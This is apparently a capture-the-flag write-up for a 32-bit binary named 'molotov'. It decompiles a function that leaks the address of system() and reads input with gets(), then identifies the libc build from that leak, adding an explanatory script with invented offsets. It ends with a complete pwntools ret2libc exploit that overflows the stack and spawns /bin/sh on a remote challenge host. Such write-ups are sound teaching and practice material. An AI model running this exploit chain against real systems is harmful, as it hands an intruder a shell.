# Molotov

## Overview

Running the binary prints a hex value and prompts for input:

```
$ ./molotov
f7d9ef00
Input :
```

We can definitely cause it to segfault:

```
$ python3 -c 'print("A"*300)' | ./molotov
f7d61f00
Input : 
Segmentation fault
```

So let's work out what this value is and how we can use it.

## Decompilation

We chuck the binary into Ghidra and get a simple decompilation. `main` calls `vuln` and does almost nothing else. `vuln`, however, has *some* interesting stuff:

```c
#include <stdio.h>
#include <stdlib.h>

int vuln(void){
    char buffer [24];           // small fixed-size stack buffer

    printf("%x\n",system);      // leaks the address of libc's system()
    puts("Input : ");

    gets(buffer);               // no length check: anything past 24 bytes smashes the stack

    return 0;
}
```

It prints the address of `system`! Awesome.

Let's run the binary on the remote server to leak the libc version.

```
$ nc 54.210.217.206 1240
f7d3c8b0
Input :
```

Now that we essentially have a libc leak, we head over to [find the libc version](https://libc.blukat.me/).

![There are 4 matches](https://gblobscdn.gitbook.com/assets%2F-MFC6wsr3fMfJKJtYtmn%2F-MG4TH0ZQ5tkG_qg_28t%2F-MG4_uje-dVyvfpG0wn5%2Fimage.png?alt=media\&token=fd4a0efa-27f3-47fc-8d8c-8de6e2eed2d3)

Annoyingly, there are 4 possible libc versions, and we can only pick between them by trial and error. Aside from identifying the libc version, the exploit is quite simple: subtract the offset of `system` from the leaked address to get the `libc` base, then use that base to find the address of the `/bin/sh` string inside libc.

The correct libc version is `2.30-0ubuntu2.1_i386`.
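To show why one leaked address narrows libc down to a handful of builds rather than a single one, here is an added example (not the writeup's own code) that reproduces the matching step offline. It assumes a constructed, made-up symbol table in the `name hexoffset` line form that libc-database uses for its `.symbols` files; the candidate names and offsets are placeholders, not real libc offsets.

```python
# Constructed stand-in for a libc symbol database: candidate build -> symbols text.
# Names and offsets are invented for this example (only the low 12 bits matter
# for the matching logic); real ones come from libc-database or `readelf -s`.
SYMBOL_DB = {
    "libc-candidate-A": "system 0003e8b0\nstr_bin_sh 0017e0cf\n",
    "libc-candidate-B": "system 0003f8b0\nstr_bin_sh 0017f0a4\n",
    "libc-candidate-C": "system 000418b0\nstr_bin_sh 001810b1\n",
    "libc-candidate-D": "system 0003d8b0\nstr_bin_sh 0017b5ba\n",
    "libc-candidate-E": "system 0003d200\nstr_bin_sh 0017e0cf\n",
    "libc-candidate-F": "system 0003ada0\nstr_bin_sh 0015ba0b\n",
}

# libc is mmap'd at a page-aligned base, so ASLR changes only the bits above
# the page offset: the low 12 bits of a leaked symbol equal the low 12 bits
# of its offset inside the library.
PAGE_SIZE = 0x1000


def parse_symbols(text):
    """Parse `name hexoffset` lines into {name: int offset}."""
    syms = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2:
            syms[parts[0]] = int(parts[1], 16)
    return syms


def match_leak(leak, symbol, db):
    """Return {candidate: libc_base} for every build whose offset of `symbol`
    is consistent with the leak, i.e. leak - offset lands on a page boundary."""
    hits = {}
    for name, text in db.items():
        off = parse_symbols(text).get(symbol)
        if off is not None and (leak - off) % PAGE_SIZE == 0:
            hits[name] = leak - off
    return hits


def resolve(base, text, *names):
    """Rebase the requested symbols of one candidate onto the computed libc base."""
    syms = parse_symbols(text)
    return {n: base + syms[n] for n in names}


if __name__ == "__main__":
    leak = 0xf7d3c8b0  # the value the remote service printed in the writeup
    for name, base in match_leak(leak, "system", SYMBOL_DB).items():
        a = resolve(base, SYMBOL_DB[name], "system", "str_bin_sh")
        print(f"{name}: base={base:#x} system={a['system']:#x} /bin/sh={a['str_bin_sh']:#x}")
```

With only one leaked symbol, every build sharing those low 12 bits is a valid match, which is exactly why the database reports several candidates and the writeup resolves the remainder by trial and error.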

## Exploitation

```python
from pwn import *

elf = context.binary = ELF('./molotov')

if args.REMOTE:
    libc = ELF('./libc-remote.so')     # the 2.30-0ubuntu2.1_i386 libc identified above
    p = remote('54.210.217.206', 1240)
else:
    libc = elf.libc
    p = process()

# The first line printed is the address of system() in hex
addr = int(p.recvline(), 16)
p.clean()

# Rebase libc so that every symbol resolves to its runtime address
libc.address = addr - libc.sym['system']

rop = ROP(libc)
rop.raw(b'A' * 32)                     # padding up to the saved return address
rop.system(next(libc.search(b'/bin/sh\x00')))

p.sendline(rop.chain())
p.interactive()
```
